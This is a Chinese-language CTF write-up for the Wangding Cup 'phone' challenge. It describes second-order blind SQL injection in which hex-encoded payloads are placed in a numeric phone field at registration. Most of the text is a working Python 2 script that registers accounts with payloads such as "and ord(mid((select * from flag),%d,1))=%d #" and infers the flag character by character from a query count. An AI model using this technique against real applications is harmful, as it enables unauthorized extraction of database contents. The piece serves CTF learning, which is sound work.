网鼎杯题目“phone”--十六进制mysql注入

注册后，即可点击查看谁的电话和我类似。

注册时有三个必填项，分别是用户名、密码和电话。电话要求必须数字。

注册个1111的电话后，点击查看，返回有1个人电话和我类似，在注册一个为1111的，返回有2人电话和我类似。 说明连数据库查询了，而且只返回数字。

盲注的思路，注册时电话填写十六进制。

于是python如下：

#coding=utf-8

import requests
import binascii
import re

def login_sqli(url,username,password,payload):
    
    url = url
    username = username
    password = password


    headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0'
    }
    
    
    
    # login
    data = {'username':username,
    'password':password,
    'phone':payload,
    'register':'Login'
    }
    

    try:
        #get_session
        s = requests.session()
        req1 = s.get(url+'/index.php')
        
        #register
        req2 = s.post(url+'/register.php',data = data)
        
        #sqli
        req3 = s.get(url+'/query.php')
        return req3.text
    
    except:
        print 'Error'

    
    
if __name__ == '__main__':
    
    login_url = 'http://6705466128f243d0aff0aba9deb7317439a2f08c6e9c4760.game.ichunqiu.com'
    password = '123123'
    result = ''
    pattern = re.compile(r'd?d?d?d?d?d')

    for i in range(1,43):
        for j in range(33,128):

            payload = "5555%%' and ord(mid((select * from flag),%d,1))=%d #" %(i,j)
            payload_0x = binascii.b2a_hex(payload)
            _payload = '0x'+payload_0x

            username = 'userrif'+str(i)+str(j)

            text = login_sqli(login_url,username,password,_payload)
            #time.sleep(3)

            r = re.search(pattern,text)

            if(int(r.group()) > 0):
                print str(i)+'-->'+chr(j)
            else:
                continue

结果：